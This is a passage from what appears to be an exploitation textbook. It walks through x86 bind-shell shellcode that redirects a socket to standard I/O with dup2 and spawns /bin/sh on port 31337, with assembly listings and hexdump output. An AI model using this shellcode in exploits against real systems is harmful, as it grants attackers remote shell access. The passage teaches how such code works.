int dup(int oldfd);
int dup2(int oldfd, int newfd);
DESCRIPTION
dup() and dup2() create a copy of the file descriptor oldfd.
dup2() makes newfd be the copy of oldfd, closing newfd first if necessary.
The bind_port.s shellcode left off with the connected socket file descriptor
in EAX. The following instructions are added in the file bind_shell_beta.s to
duplicate this socket into the standard I/O file descriptors; then, the tiny_shell
instructions are called to execute a shell in the current process. The spawned
shell's standard input and output file descriptors will be the TCP connection,
allowing remote shell access.
New Instructions from bind_shell1.s
; dup2(connected socket, {all three standard I/O file descriptors})
mov ebx, eax ; Move socket FD in ebx.
push BYTE 0x3F ; dup2 syscall #63
pop eax
xor ecx, ecx ; ecx = 0 = standard input
int 0x80 ; dup2(c, 0)
mov BYTE al, 0x3F ; dup2 syscall #63
inc ecx ; ecx = 1 = standard output
int 0x80 ; dup2(c, 1)
mov BYTE al, 0x3F ; dup2 syscall #63
inc ecx ; ecx = 2 = standard error
int 0x80 ; dup2(c, 2)
; execve(const char *filename, char *const argv [], char *const envp[])
mov BYTE al, 11 ; execve syscall #11
push edx ; push some nulls for string termination.
push 0x68732f2f ; push "//sh" to the stack.
push 0x6e69622f ; push "/bin" to the stack.
mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.
push ecx ; push 32-bit null terminator to stack.
mov edx, esp ; This is an empty array for envp.
push ebx ; push string addr to stack above null terminator.
mov ecx, esp ; This is the argv array with string ptr.
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])
When this shellcode is assembled and used in an exploit, it will bind to
port 31337 and wait for an incoming connection. In the output below, grep
is used to quickly check for null bytes. At the end, the process hangs waiting
for a connection.
reader@hacking:~/booksrc $ nasm bind_shell_beta.s
reader@hacking:~/booksrc $ hexdump -C bind_shell_beta | grep --color=auto 00
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|
00000010 89 c6 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a |..jfXCRfhzifS..j|
00000020 10 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd |.QV.....fCCSV...|